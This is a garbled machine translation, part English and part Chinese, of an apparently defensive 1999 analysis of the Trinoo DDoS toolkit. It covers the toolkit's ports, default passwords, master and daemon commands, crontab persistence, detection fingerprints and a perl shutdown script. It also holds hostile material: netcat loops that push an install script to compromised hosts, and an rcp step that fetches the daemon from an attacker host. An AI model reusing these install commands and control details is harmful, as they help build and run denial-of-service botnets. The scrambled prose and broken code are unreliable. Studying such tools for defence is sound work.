linux hacking tools introduced Trinoo Analysis of DDoS attack tools

This article is a denial of service attack tool kit trinoo in master / slave server of some analysis.

Trinoo daemon binary code package was initially in a number of Solaris 2.x hosts found in these hosts is to use RPC service attack vulnerability "statd", "cmsd" and "ttdbserverd" invasion. On the details of these vulnerabilities, please see the CERT record of 99-04 events:

http://www.cert.org/incident_notes/IN-99-04.html
Trinoo initial daemon from some UDP-based access control protocol and remote command shell, and is likely to automatically record comes with a sniffer (sniffer).
Look at the tool kit in the process, capture the attack Trinoo network installation process and some source code. We use these to capture the source code to enter an in-depth analysis.


Of these source code of any modifications, such as prompts, passwords, commands, TCP / UDP port number or supported attack methods, signatures, and specific functions, can enable the analysis of different results in this article.


The daemon is a Solaris 2.5.1 and Red Hat Linux 6.0 and run the compiler. Master server (master) in the Red Hat Linux 6.0 and run the compiler. But perhaps the main server daemon, and can be used in other similar platform.


Trinoo network may contain hundreds or even thousands of Taiwan has been the invasion of the composition of Internet hosts. These hosts are likely to have been fitted with a variety of "back door" to facilitate the re-entry into the system.


In August 17, 1999, a host at least 227 (of which 114 belong to Internet2 host), composed of trinoo network attacks at Minnesota (Minnessota) of a host university, and the result is the collapse of the host network of more than 2 days . And during the attack in the investigation, and at least 16 other hosts to be attacked, including some outside the United States host. (Please refer to Appendix D in order to understand the report of the attack trinoo.


Attack the course


The course of a typical attack is likely to be like this:


　　1）一个盗取来的帐号被用于编译各种扫描工具、攻击工具（如缓冲区溢出程序）、rootkit和sniffer、trinoo守护程序、主服务器、入侵主机、目标主机清单等等。 The system usually has a lot of users, the existence of loopholes in management and high-speed connection speed (for file transfer) of the large mainframe systems.


2) and then for a wide range of network scan to determine the potential target of the invasion. The most likely those who may have a variety of remote buffer overflow vulnerability of the host, such as wu-ftpd, RPC services (cmsd, statd, ttdbserverd, amd) and so on. They host the best operating system is Sun Solaris 2.x and Linux, in order to take full advantage of a variety of ready-made, such as rootkits and backdoors. If it is other systems can be used to preserve and record tool.


3) invasion of the host list has been the preparation of the achievement of the invasion attacks, monitor TCP port (usually 1524 "ingreslock") and connect to the port in order to determine the success of the invasion script. Or by sending a free e-mail to the WEB-mail to confirm that the host has been invaded.


Invasion after the completion of a "controlled" host list of host will be used to place a backdoor, sniffer or trinoo daemon or trinoo master server.


4) invasion of the system from the list of selected trinoo network to meet the needs of the establishment of the host, has compiled a good place trinoo daemon.


5) Finally, run the DoS attack script, the script has been established in accordance with the above list of invasion of the host to generate an additional script, in the background to automatically install the fastest speed. Script to use "netcat" will be sent to the shell scripts have been hacked host port 1524/tcp.


. / Trin.sh nc 128.aaa.167.217 1524 &
. / Trin.sh nc 128.aaa.167.218 1524 &
. / Trin.sh nc 128.aaa.167.219 1524 &
. / Trin.sh nc 128.aaa.187.38 1524 &
. / Trin.sh nc 128.bbb.2.80 1524 &
. / Trin.sh nc 128.bbb.2.81 1524 &
. / Trin.sh nc 128.bbb.2.238 1524 &
. / Trin.sh nc 128.ccc.12.22 1524 &
. / Trin.sh nc 128.ccc.12.50 1524 &
...


Which "trin.sh" script generated the following output:


echo "rcp 192.168.0.1: leaf / usr / sbin / rpc.listen"
Echo "echo rcp is done moving binary"
Echo "chmod + x / usr / sbin / rpc.listen"
Echo "echo launching trinoo"
Echo "/ usr / sbin / rpc.listen"
Cron "
Echo "crontab cron"
Echo "echo launched"
Echo "exit"


From time to time to check if crontab file, you can easily monitor whether or not the host has been invaded trinoo.


In other systems also found another way: the name of daemon was changed to "xterm", and then run it through the script.


Cd / var/adm/.1
PATH =.: $ PATH
Export PATH & 1


Guardian in the proceedings by running the script to complete the establishment of a network trinoo is entirely possible.


More subtle method is to let trinoo daemon / master server in a given wake-up time was running, and open to monitor the TCP or UDP port.


The entire installation process automatically allow an attacker in a very short period of time, the use of a large number of the invasion of the host to establish a network denial of service attacks.


6) as an option, rootkit is often installed into the system to hide the attacks, files, and network connections. This is the main server system to run more important, because it is the core of the network trinoo. (Note: In many cases, the main server is often installed in the Internet service provider (ISP) domain name server, DNS server a large number of communications traffic, a large number of TCP / UDP connections, for covert trinoo network connections, the attack process and documents to help provide very favorable. (In addition, unless it can determine the existence of the domain name server acts of denial of service tool, or system administrator is generally not easily interrupted to carry out safety inspection service.)


Rootkits may also install a sniffer in the use of the system, such as the "hunt" (TCP / IP session monitor) can be directly tapped, such as the details of network communication procedures. This will end any process through remote buffer overflow to enter the system. :)


To get more information on rootkits, visit the following websites:


http://staff.washington.edu/dittrich/faq/rootkits.faq


Target host


Trinoo network from the main server (master.c) and trinoo daemon (ns.c) component. Trinoo a typical network structure is as follows:


Control of the attacker is often one or more of the "main server" server, and each a "master server" server control a number of "daemon" (we can call radio host "Bcast / broadcast"). All orders received by use daemon attack packets at the same time attacked one or more target host system.


Trinoo how to achieve this function? Attack and the main server through the "telnet" protocol to establish TCP connection, and a password by sending a command to attack, the realization of large-scale, high-volume, concurrency of denial of service attacks.
Communications port


Attacker to the master server: 27665/TCP
Master server to daemon: 27444/UDP
To the main server daemon: 31335/UDP


Trinoo main server through the remote control 27665/TCP ports in the establishment of the TCP connection. After the connection is established, the user must provide the correct password ( "betaalmostdone"). If the authentication has been adopted by another of the connection is established, then a connecting IP address is included in the warning message will be sent to connected hosts (to provide the IP address seems to be wrong, but still send a warning message). There is no doubt that this feature eventually will be able to complete the realization of the attacker given enough time to clear before leaving traces.


From the main server to trinoo Daemon connection port in the achievement of 27444/UDP. Command line format is as follows:


Arg1 password arg2


Which the default password is "l44adsl", only contains the password sub-string "l44" the command line will be executed.


Trinoo daemon from the server to connect to the main 31335/UDP port in the achievement.


When the daemon starts, it will send initialization string "* HELLO *" to the main server. The main server (through the "sniffit" capture procedures) have been recorded and the maintenance of a list of activation daemon:


UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
45 E 00. 00. 23 # B1. 5D] 40 @ 00. F8. 11. B9. 27. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6C l 7A z 67 g 00. 0F. 06. D4. 2A * 48 H 45 E 4C L
4C L 4F O 2A *


If the main server through trinoo port 27444/UDP sent to a daemon "png" command, the daemon will send 31335/UDP port to the "png" command to return to the host string "PONG":


UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l
UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
45 E 00. 00. 20 13. 81. 40 @ 00. F8. 11. 57 W 07. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6F o 7A z 67 g 00. 0C. 4E N 24 $ 50 P 4F O 4E N 47 G


Password protection


Master servers and daemon have password protection, to prevent the system administrator (or other hackers organizations) by the trinoo control over the network. Password using the crypt () encryption function. This is a symmetric encryption method. Encrypted password stored in the main server has been compiled and guard procedures, and to express the way in the network transmission of the password comparison (current version is not encrypted communications session, so it is not difficult to intercept in the main server to send TCP control session Password express.


Run-time initialization, the main guardian of the process of prompt appears, enter the password will be waiting. If the password is not correct, exit the procedure; if the password is correct, prompt process is running, and then have a child process to run in the background, and finally to withdraw from:


#. / Master
?? Wrongpassword
#
...
#. / Master
?? GOravev1.07d2 + f3 + c [Sep 26 1999:10:09:24]
#


And such like a, when the port to connect to a remote command (27665/TCP), you also must enter a password:


Attacker $ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is'^]'.
Kwijibo
Connection closed by foreign host.
...
Attacker $ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is'^]'.
Betaalmostdone
Trinoo v1.07d2 + f3 + c.. [Rpm8d/cb4Sx /]


From the main server is sent to the daemon trinoo certain there will be password-protected command. These passwords in the main server and the daemon to send the form again explicitly.


Default password is as follows:


"L44adsl" trino Daemon Password
"gOrave" trinoo master server to start (hint "??")
"betaalmostdone" trinoo master server remote interface password
"killme" trinoo master server control orders "mdie" Password Authentication


Master server command


Rinoo master server supports the following command:


Die closure of the main server
Quit from the main server log
DoS settings mtimer N for N seconds timer. N values ranging from 1-1999 seconds. If N <1,2000, the default value of 500 is used.
If the password authentication mdie pass through, then stop all broadcast (Bcast) host. Order
"d1e 144adsl" was sent to each host a radio so that they stop. This life


The need for a separate password.


PING command mping Send "png 144adsl" to each of the radio host has been activated.
Mdos


To each host a radio order to send more than DoS attacks


( "Xyz 144adsl 123: ip1: ip2: ip3").
Print version info and compile information. Such as:
This is the "trinoo" AKA DoS Project master server version v1.07d2 + f3 + c
Compiled 15:08:41 Aug 16 1999
DoS attack msize set up to use the buffer size of data packets.


nslookup host on the specified host name to query.


try to clear the deadlock killdead radio host. First of all, to all known radio host


"Shi l44adsl" command. (Any state in the activation daemon will be back


Send initialization string "* HELLO *". ) And then (through the-b parameter) to amend Canton


Host broadcast the names of the list of documents. Such as "* HELLO *" after the package has been received to re -


New initialization.


usebackup to switch to from "killdead" ordered the establishment of the radio host backup file.
list all activated bcast radio host.
help [cmd] or order the help of server information,
mstop trying to stop a DoS attack (this has not yet realized, but are listed in the help command.)


Daemon commands


Trinoo daemon supports the following command:


aaa pass IP to attack the designated IP address. At a fixed time interval (default is 120 seconds, or


"bbb" command set the value of 1-1999) to the designated IP address of a random UDP port


(0-65534) to send UDP packets. Packet size is determined by the "rsz" order, the


Default of 1000 bytes. Daemon noo


DoS attacks rsz N set the buffer size to N bytes. (Trinoo transfer daemon


Using malloc () the distribution of the size of the buffer zone, and then send random packets


Offensive content. )


Xyz pass 123: ip1: ip2: ip3


A number of DoS attacks. Similar to "aaa" command, but they can attack a number of IP addresses at the same time.


Tool characteristics


-----------


The installation of the most commonly used method trinoo daemon is added in the system crontab items, so that daemons are able to run every minute. Crontab file will be found to check the following:


* * * * * / Usr / sbin / rpc.listen


The main server program will create a radio host that contains a list of the files (default file name is "...")。 If you use the "killdead", the document "..." to send all the guardian of "shi" daemon command to bring them all of the main server to send initialization string "* HELLO *". The list of documents and then have to change its name (the default for "...- b "), and sent each a" * HELLO * "string (activated state) of the daemon to generate a list of new documents.


Source code ( "master.c") line contains the following procedures:


...
/ * Crypt key encrypted with the key 'bored' (so hex edit cannot get key easily?)
Comment out for no encryption ... * /


# Define CRYPTKEY "ZsoTN.cq4X31"
...


If the program compiler know when CRYPTKEY variables specified, the radio host's IP address will be encrypted using the Blowfish algorithm:


# Ls-l ... ...-b
-rw ------- 1 root root 25 Sep 26 14:46 ...
-rw ------- 1 root root 50 Sep 26 14:30 ...- b
# Cat ...
JPbUc05Swk/0gMvui18BrFH /
# Cat ...- b aE5sK0PIFws0Y0EhH02fLVK.
JPbUc05Swk/0gMvui18BrFH /


Assumptions do not use the rootkit to hide processes, the main server can show the following characteristics of the network socket fingerprint (of course, the name and path name will vary.):



# Netstat-a - inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
Tcp0 0 *: 27665 *: * LISTEN
...
Udp0 0 *: 31335 *: *
...
# Lsof egrep ": 31335:27665"
master 1292 root3u inet 2460 UDP *: 31335
master 1292 root4u inet 2461 TCP *: 27665 (LISTEN)
# Lsof-p 1292
COMMAND PID USER FD TYPE DEVICESIZE NODE NAME
master 1292 root cwdDIR3, 11024 14356 / tmp / ...
Master 1292 root rtdDIR3, 11024 2 /
master 1292 root txtREG3, 1 30492 14357 / tmp / ... / master
master 1292 root memREG3, 1 342206 28976 / lib/ld-2.1.1.so
master 1292 root memREG3, 1 63878 29116 / lib/libcrypt-2.1.1.so
master 1292 root memREG3, 1 4016683 29115 / lib/libc-2.1.1.so
master 1292 root0u CHR4, 1 2967 / dev/tty1
master 1292 root1u CHR4, 1 2967 / dev/tty1
master 1292 root2u CHR4, 1 2967 / dev/tty1
master 1292 root3u inet 2534 UDP *: 31335
master 1292 root4u inet 2535 TCP *: 27665 (LISTEN)


And run the daemon of the system will display the following fingerprint:


# Netstat-a - inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
...
Udp0 0 *: 1024 *: *
Udp0 0 *: 27444 *: *
...
# Lsof egrep ": 27444"
ns 1316 root3u inet 2502 UDP *: 27444
# Lsof-p 1316
COMMAND PID USER FD TYPE DEVICESIZE NODE NAME
ns 1316 root cwdDIR3, 11024 153694 / tmp / ...
Ns 1316 root rtdDIR3, 11024 2 /
ns 1316 root txtREG3, 16156 153711 / tmp / ... / ns
ns 1316 root memREG3, 1 342206 28976 / lib/ld-2.1.1.so
ns 1316 root memREG3, 1 63878 29116 / lib/libcrypt-2.1.1.so
ns 1316 root memREG3, 1 4016683 29115 / lib/libc-2.1.1.so
ns 1316 root0u CHR4, 1 2967 / dev/tty1
ns 1316 root1u CHR4, 1 2967 / dev/tty1
ns 1316 root2u CHR4, 1 2967 / dev/tty1
Ns 1316 root3u inet 2502UDP *: 27444
Ns 1316 root4u inet 2503UDP *: 1024


Defense


Of course, the best defense is to prevent the invasion and the first root-level security threats, so that your system will not be installed on the main server trinoo / guardian of the server. In an ideal world, all systems are playing all the patches, it is safe and is being monitored, intrusion monitoring systems and firewalls can monitor and refused to attack the success of the packet, and I is a six-month living in Barry Island, six months living in the French Alps millionaire. :) But in the real world, it can not be achieved (at least in the foreseeable future).


If your network may have been installed in the operation of a number of trinoo daemon, and is always ready to carry out DoS attacks on other systems, how to find and stop them?


Because these procedures in the communications and attack the high-level use UDP port, in order to direct blockage of these communications is very difficult (but not impossible), unless you update the UDP port to use high-level procedures.


The most simple checks for the presence of the main server and trinoo daemon is probably the way to the Ethernet in the data segment shared a close watch on all of the UDP packet to find mentioned in this article on the main server daemon communication with tags. Unfortunately, these activities can only be in the target host DoS attack / after are likely to be discovered and detected.


If there is any doubt the existence of ongoing system trinoo attack daemon on the daemon running in the Solaris system to run "truss" program will receive the following output:


...
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping. ..)
getmsg (3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0
Time () = 938385467
Open ( "/ dev / udp", O_RDWR) = 5
Ioctl (5, I_PUSH, "sockmod") = 0
Ioctl (5, I_STR, 0xEFFFF748) = 0
Ioctl (5, I_SETCLTIME, 0xEFFFF7FC) = 0
Ioctl (5, I_SWROPT, 0x00000002) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
Ioctl (5, I_STR, 0xEFFFF660) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
sigprocmask (SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0) = 0
Ioctl (5, I_STR, 0xEFFFF548) = 0
sigprocmask (SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
Putmsg (5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0
Time () = 938385467
...


When a single target attacks, the use of "tcpdump" to monitor network traffic has the following output:


# Tcpdump ip host 192.168.0.1


... 192.168.0.1.27444: udp 25 216.160.XX.YY.16838: udp 4 (DF) 216.160.XX.YY.5758: udp 4 (DF) 216.160.XX.YY.10113: udp 4 (DF) 216.160.XX.YY.17515: udp 4 (DF) 216.160.XX.YY.31051: udp 4 (DF) 216.160.XX.YY.5627: udp 4 (DF) 216.160.XX.YY.23010: udp 4 ( DF) 216.160.XX.YY.7419: udp 4 (DF) 216.160.XX.YY.16212: udp 4 (DF) 216.160.XX.YY.4086: udp 4 (DF) 216.160.XX.YY.2749: udp 4 (DF) 216.160.XX.YY.12767: udp 4 (DF) 216.160.XX.YY.9084: udp 4 (DF) 216.160.XX.YY.12060: udp 4 (DF) 216.160.XX.YY.32225 : udp 4 (DF)


...
Deficiencies and weaknesses


The first flaw is the use of crypt () password encryption function, and can be intercepted by the main server and communication between the daemon information and return to the prompt string.


This will enable you to identify the existence of the main server or daemon, to determine the existence of this article referred to the default password, they may let you through the decryption of the password to access some (or all) trinoo network control.


However, if the source code by an attacker who modified clever, you might have to crack the password, or use a hex / ASCII editor to amend the document binary code sequence of commands to get the main program / daemon list host.


If the source code is very fortunate to have not been modified, you can search for files in the default installation of string to find a password:


# Strings - ns
...
Socket
Bind
Recvfrom
% S% s% s
aIf3YWfOhw.V .<=== crypt () encrypted password "l44adsl"
PONG
* HELLO *
...
# Strings - master
...
--- V
V1.07d2 + f3 + c
Trinoo% s
l44adsl <=== clear text version of daemon password
Sock
0nm1VNMXqRMyM <=== crypt () encrypted password "gOrave"
10:09:24
Sep 26 1999
Trinoo% s [% s:% s]
Bind
Read
* HELLO *
ZsoTN.cq4X31 <=== CRYPTKEY
Bored
NEW Bcast -% s
PONG
PONG% d Received from% s
Warning: Connection from% s
beUBZbLtK7kkY <=== crypt () encrypted password "betaalmostdone"
Trinoo% s.. [Rpm8d/cb4Sx /]
...
DoS: usage: dos
DoS: Packeting% s.
Aaa% s% s
Mdie
ErDVt6azHrePE <=== crypt () encrypted password for "mdie" command
Mdie: Disabling Bcasts.
D1e% s
Mdie: password?
...


The second defect is greater in the network to explicitly send the password daemon. Assuming you know the main server and the client (daemon) to connect the UDP port number, you can use "sniffit", "ngrep", "tcpdump" or other network monitoring procedures for cut-off


UDP packets were of the password (Appendix A is a use "ngrep" example).


For example: The following are through "sniffit" intercepted include "png" command packet contents:


UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 '1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l


As mentioned earlier, trinoo master server "mdie" command is password protected. There are several ways to break it.


If you can use the UNIX command "strings" to find the encrypted password, and perhaps can be used to decrypt a password cracking tools (see Appendix C). While this method may break a very long time (if the password strength of words), it is feasible. (We have a Pentium II machine to spend less than 30 seconds to break out on the "mdie" command is the password "kellme".)


You might also try to attack the main server and the network between the tapping password, but if you need the password of the command does not always (or even never) be executed, then the difficulty will be immense.


You may be lucky enough to password interception procedures to guard, as most commands need it. This may appear in the daemon-side or server-side of the main network (the two servers may be two completely different types of networks) in the. Daemon client in the interception of network is more desirable since the number of daemon data more than the main server. Another reason is that many of the main server was found in the main domain name server is running, the host of the high-level data flow UDP port where the host daemon than the data traffic is much greater, will increase the difficulty of tapping a lot. In addition, when you find a site running in a number of daemon, which often means that you can completely determine the system is invaded. :)


Once you've found a daemon, you will be able to access the main server where the IP address list (available through "strings" command). You should immediately administrator through these sites in detail for its host intrusion detection system. (If the attacker uses the rootkit, you may need to consult a professional security company and experts.)


If it is found that the main server daemon can be in their list of document procedures for all the IP address of guardian (if the case had not been encrypted). However, if the file is encrypted, you use the compiler to a file or the password to decrypt the keyword (the Blowfish algorithm for encryption algorithm), or control of the master server and use the "bcast" command to obtain a list of activation daemon.


If you found a server with the main activities of the conversation (the conversation is a "telnet" the TCP session), you can use the "hunt" program intercepted the conversation, and run the command. Although do not know "mdie" command password, can not directly stop all the daemons, but you can use the "bcast" command to obtain a list of all daemon. (As the list may contain a very large list, it is recommended to achieve the preparation of the command script.)


Once you know all the daemon's IP address, and password daemon, you can send a command string that contains the correct data of the UDP outsourcing trinoo any suspicious daemon. LibNet, Spak and Perl Net:: RawIP database tools such as structure and can be used to send UDP packets. (One uses the Net:: RawIP the Perl script "trinot" dedicated to the completion of this work. Please refer to Appendix B.)


Because the daemon process of a typical installation of the system to add a minute to run automatically every entrance of the crontab, you should remove them completely to prevent its re-run.


In tapping your network that contains the string "* HELLO *", "PONG" or any other characteristics of the UDP packet strings can also prove that daemon has been installed to the network. Note that this applies to the source code unmodified version. The following is a "ngrep" program to capture the success of the examples:


# Ngrep-i-x "* hello * pong" udp
interface: eth0 (192.168.0.200/255.255.255.0)
Filter: ip and (udp)
Match: * hello * pong
...
# 10.0.0.1:31335
2a 48 45 4c 4c 4f 2a * HELLO *
# # # 10.0.0.1:31335
50 4f 4e 47 PONG 10.0.0.1:31335
50 4f 4e 47 PONG 10.0.0.1:31335
50 4f 4e 47 PONG
...


Even if they do not have any weaknesses trinoo, but still trinoo network can find its weaknesses.


As mentioned earlier, some systems use a crontab to run the daemon, this is a very clear marker.


Trinoo network to automatically install script using the Berkeley of the "rcp" command. As long as the system to the network to monitor the external IP address "rcp" connections (514/TCP), can be determined quickly. (Note: The script used in "rcp" the need for a relationship of trust between the host, often in the user's ~ /. Rhosts file contains "+ +." By checking the document can be immediately aware of the possibility of a system intrusion. )


(For further analysis trinoo Please refer to Appendix E, by George Weaver of Pennsylvania State University and David Brumley of Stanford niversity prepared "more trinoo monitoring method" article.)
Appendix A: "ngrep" network session capture


The following is a "ngrep" attack to capture a conversation examples:


# Ngrep-x ".*" tcp port 27665 or udp port 31335 or udp port 27444
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and (tcp port 27665 or udp port 31335 or udp port 27444)
Match: .*
# 10.0.0.1:31335
2a 48 45 4c 4c 4f 2a * HELLO *
# 10.0.0.1:27665 [AP]
Ff f4 ff fd 06 .....
###### 10.0.0.1:27665 [AP]
62 65 74 61 61 6c 6d 6f73 74 64 6f 6e 65 0d 0abetaalmostdone ..
# 192.168.100.1:1074 [AP]
74 72 69 6e 6f 6f 20 7631 2e 30 37 64 32 2b 66trinoo v1.07d2 + f
33 2b 63 2e 2e 5b 72 706d 38 64 2f 63 62 34 533 + c.. [Rpm8d/cb4S
78 2f 5d 0a 0a 0a x /]...
# # 192.168.100.1:1074 [AP]
# # # 10.0.0.1:27665 [AP]
62 63 61 73 74 0d 0a bcast ..
# 192.168.100.1:1074 [AP]
4c 69 73 74 69 6e 67 2042 63 61 73 74 73 2e 0aListing Bcasts ..
0a.
# # # 192.168.100.1:1074 [AP]
31 39 32 2e 31 36 38 2e30 2e 31 2e 20 20 20 0a192.168.0.1.
0a 45 6e 64 2e 20 31 2042 63 61 73 74 73 20 74.End. 1 Bcasts t
# # 10.0.0.1:27665 [AP]
6d 74 69 6d 65 72 20 3130 30 30 0d 0a mtimer 1000 ..
# # 192.168.100.1:1074 [AP]
6d 74 69 6d 65 72 3a 2053 65 74 74 69 6e 67 20mtimer: Setting
74 69 6d 65 72 20 6f 6e20 62 63 61 73 74 20 74timer on bcast t
6f 20 31 30 30 30 2e 0a o 1000 ..
# 192.168.0.1:27444
62 62 62 20 6c 34 34 6164 73 6c 20 31 30 30 30bbb l44adsl 1000
# # 192.168.100.1:1074 [AP]
6d 74 69 6d 65 72 3a 2053 65 74 74 69 6e 67 20mtimer: Setting
74 69 6d 65 72 20 6f 6e20 62 63 61 73 74 20 74timer on bcast t
6f 20 31 30 30 30 2e 0a o 1000 ..
# # # 192.168.100.1:1074 [AP]
# # # 10.0.0.1:27665 [AP]
6d 73 69 7a 65 20 33 3230 30 30 0d 0a msize 32000 ..
# 192.168.0.1:27444
72 73 7a 20 33 32 30 3030 rsz 32000
# 192.168.100.1:1074 [AP]
# # # 10.0.0.1:27665 [AP]
64 6f 73 20 32 31 36 2e31 36 30 2e 58 58 2e 59dos 216.160.XX.Y
59 0d 0a Y..
# 192.168.100.1:1074 [AP]
44 6f 53 3a 20 50 61 636b 65 74 69 6e 67 20 32DoS: Packeting 2
31 36 2e 31 36 30 2e 5858 2e 59 59 2e 0a 16.160.XX.YY..
# 192.168.0.1:27444
61 61 61 20 6c 34 34 6164 73 6c 20 32 31 36 2eaaa l44adsl 216.
31 36 30 2e 58 58 2e 5959 160.XX.YY
# 192.168.100.1:1074 [AP]
# # 10.0.0.1:27665 [AP]
71 75 69 74 0d 0a quit ..
# 192.168.100.1:1074 [AP]
62 79 65 20 62 79 65 2e0a bye bye ..
# # # 10.0.0.1:27665 [AP]
62 65 74 61 61 6c 6d 6f73 74 64 6f 6e 65 0d 0abetaalmostdone ..
# # 192.168.100.1:1075 [AP]
74 72 69 6e 6f 6f 20 7631 2e 30 37 64 32 2b 66trinoo v1.07d2 + f
33 2b 63 2e 2e 5b 72 706d 38 64 2f 63 62 34 533 + c.. [Rpm8d/cb4S
78 2f 5d 0a 0a 0a x /]...
# # # 192.168.100.1:1075 [AP]
# # # 10.0.0.1:27665 [AP]
6d 70 69 6e 67 0d 0a mping ..
# # 192.168.100.1:1075 [AP]
6d 70 69 6e 67 3a 20 5365 6e 64 69 6e 67 20 61mping: Sending a
20 50 49 4e 47 20 74 6f20 65 76 65 72 79 20 42 PING to every B
63 61 73 74 73 2e 0a casts ..
# 192.168.0.1:27444
70 6e 67 20 6c 34 34 6164 73 6c png l44adsl
# # 10.0.0.1:31335
50 4f 4e 47 PONG
# # 192.168.100.1:1075 [AP] PONG 1 R
65 63 65 69 76 65 64 2066 72 6f 6d 20 31 39 32eceived from 192
2e 31 36 38 2e 30 2e 310a .168.0.1
# # 10.0.0.1:27665 [AP]
71 75 69 74 0d 0a quit ..
# 192.168.100.1:1075 [AP]
62 79 65 20 62 79 65 2e0a bye bye ..


Appendix B - Trinot script


------------------------------- Cut here ----------------- ------------------
#! / Usr / bin / perl-w
#
# Trinot v. 1.1
# By Dave Dittrich
#
# Send commands to trinoo daemon (s), causing them to PONG, * HELLO *
# To all their masters, exit, etc. Using this program (and knowledge
# Of the proper daemon password), you can affect trinoo daemons
# Externally and monitor packets to verify if the daemons are up,
# Expose their masters, or shut them down.
#
# Needs Net:: RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example:. / Trinot host1 [host2 [...]]
#. / Trinot-S host
#. / Trinot-p password-P host
#
# (This code was hacked from the "macof" program, written by
# Ian Vitek)
Require 'getopts.pl';
Use Net:: RawIP;
{}});
Chop ($ hostname = `hostname`);
Getopts ( 'PSDp: f: s: d: l: i: vh');
die "usage: $ 0 [options] host1 [host2 [...]] \ tP \ t \ t \ tSend \" png \ "command \ tS \ t \ t \ tSend \" shi \ "command \ tD \ t \ t \ tSend \ "d1e \" command (default) \ tp password \ t \ t (default: \ "l44adsl \")
\ tf from_host \ t \ t (default: $ hostname) \ ts src_port \ t \ t (default: random) \ td dest_port \ t \ t (default: 27444) \ tl ipfile \ t \ tSend to IP addresses in ipfile \ ti interface \ t \ tSet sending interface (default: eth0) \ tv \ t \ t \ tVerbose \ th This help \ n "unless (! $ opt_h);
# Set default values
$ Opt_i = ($ opt_i)? $ Opt_i: "eth0";
$ s_port = ($ opt_s)? $ opt_s: int rand 65535;
$ D_port = ($ opt_d)? $ Opt_d: 27444;
$ Pass = ($ opt_p)? $ Opt_p: "l44adsl";
# Choose network card
If ($ opt_e) ($ opt_e);
) Else (ethnew ($ opt_i);
)
$ Cmd = ($ opt_P)? "Png $ pass":
($ Opt_S)? "Shi $ pass":
($ Opt_D)? "D1e $ pass":
"D1e $ pass";
$ S_host = ($ opt_f)? $ Opt_f: $ hostname;
If ($ opt_l) (
open (I, "<$ opt_l") die "could not open file: '$ opt_l'";
While () (
Chop;
Push (@ ARGV ,$_);
)
Close (I);
)
Foreach $ d_host (@ ARGV) ($ d_host), $ cmd)
));
print "sending '$ cmd' to $ d_host \ n" if $ opt_v; send;
)
Exit (0);


　　-------------------------------　cut here　-----------------------------------
　　附录C - 参考文摘


　　TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary


　　R. Wright., Addison-Wesley.


　　lsof:


　　ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/


　　tcpdump:


　　ftp://ftp.ee.lbl.gov/tcpdump.tar.Z